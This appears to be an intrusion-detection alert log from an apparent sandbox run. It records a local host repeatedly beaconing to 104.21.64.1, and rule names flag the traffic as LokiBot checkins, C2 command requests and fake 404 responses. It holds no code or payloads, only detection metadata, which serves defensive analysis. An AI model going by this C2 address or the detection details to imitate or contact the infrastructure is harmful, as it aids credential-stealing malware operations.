2025-02-20T03:43:27.752713+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:28.504763+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:29.660543+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:29.660543+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:29.660543+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:30.375616+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:31.521910+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:31.521910+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:31.521910+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:32.302084+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:32.309783+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49745	TCP
2025-02-20T03:43:33.456489+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:33.456489+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:33.456489+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:34.207473+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:35.363345+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:35.363345+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:35.363345+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:36.139359+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:37.303125+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:37.303125+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:37.303125+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:38.070830+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:38.075914+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49749	TCP
2025-02-20T03:43:39.205648+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:39.205648+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:39.205648+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:39.936584+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:41.134380+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:41.134380+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:41.134380+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:41.914924+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:41.920221+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49751	TCP
2025-02-20T03:43:43.094784+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:43.094784+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:43.094784+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:43.907574+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:43.912590+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49752	TCP
2025-02-20T03:43:45.102723+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:45.102723+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:45.102723+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:45.839243+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:46.997245+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:46.997245+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:46.997245+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:47.712754+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:47.717726+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49754	TCP
2025-02-20T03:43:48.866259+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:48.866259+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:48.866259+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:49.660952+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:49.667999+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49755	TCP
2025-02-20T03:43:50.820013+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:50.820013+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:50.820013+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:51.567802+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:52.721741+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:52.721741+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:52.721741+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:53.545131+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:53.550248+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49757	TCP
2025-02-20T03:43:54.693351+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:54.693351+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:54.693351+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:55.482262+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:55.488427+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49758	TCP
2025-02-20T03:43:56.661305+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:56.661305+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:56.661305+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:57.403205+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:58.705695+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:43:58.705695+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:43:58.705695+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:43:59.467933+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:43:59.472981+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49760	TCP
2025-02-20T03:44:00.632178+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:00.632178+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:00.632178+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:01.394606+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:01.399671+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49761	TCP
2025-02-20T03:44:02.549016+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:02.549016+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:02.549016+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:03.203757+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:03.208740+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49762	TCP
2025-02-20T03:44:04.348269+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:04.348269+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:04.348269+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:05.170718+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:05.175755+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49763	TCP
2025-02-20T03:44:06.337593+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:06.337593+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:06.337593+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:07.123723+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:08.290722+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:08.290722+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:08.290722+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:09.168850+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:09.173953+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49766	TCP
2025-02-20T03:44:10.316672+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:10.316672+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:10.316672+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:11.054295+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:12.216353+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:12.216353+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:12.216353+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:13.092683+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:13.099060+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49779	TCP
2025-02-20T03:44:14.257584+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:14.257584+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:14.257584+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:15.060888+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:15.066841+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49793	TCP
2025-02-20T03:44:16.237190+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:16.237190+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:16.237190+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:17.017876+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:17.022997+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49806	TCP
2025-02-20T03:44:18.180783+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:18.180783+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:18.180783+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:18.948386+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:20.117514+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:20.117514+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:20.117514+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:20.910590+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:20.915778+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49829	TCP
2025-02-20T03:44:22.080002+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:22.080002+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:22.080002+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:22.852440+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:24.005441+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:24.005441+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:24.005441+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:24.819834+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:24.824962+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49854	TCP
2025-02-20T03:44:25.986832+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:25.986832+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:25.986832+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:26.634314+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:26.639425+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49868	TCP
2025-02-20T03:44:27.785264+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:27.785264+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:27.785264+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:28.529010+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:29.675258+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:29.675258+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:29.675258+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:30.432256+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:31.765736+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:31.765736+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:31.765736+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:32.663291+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:32.668381+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49908	TCP
2025-02-20T03:44:33.834170+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:33.834170+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:33.834170+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:34.661211+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:34.666252+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49922	TCP
2025-02-20T03:44:35.821785+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:35.821785+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:35.821785+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:36.566884+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:37.738492+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:37.738492+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:37.738492+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:38.560384+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:38.565398+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49946	TCP
2025-02-20T03:44:39.722812+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:39.722812+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:39.722812+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:40.528513+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:40.533589+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49958	TCP
2025-02-20T03:44:41.717939+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:41.717939+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:41.717939+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:42.375594+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:42.380787+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49973	TCP
2025-02-20T03:44:43.553868+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:43.553868+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:43.553868+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:44.228854+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:44.276001+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49986	TCP
2025-02-20T03:44:45.418212+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:45.418212+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:45.418212+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:46.211968+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:46.217280+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	49999	TCP
2025-02-20T03:44:47.367804+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:47.367804+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:47.367804+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:48.129551+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:49.319994+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:49.319994+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:49.319994+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:50.017620+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:50.023196+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50027	TCP
2025-02-20T03:44:51.269807+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:51.269807+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:51.269807+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:52.086657+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:52.091745+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50041	TCP
2025-02-20T03:44:53.251485+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:53.251485+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:53.251485+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50053	104.21.64.1	80	TCP
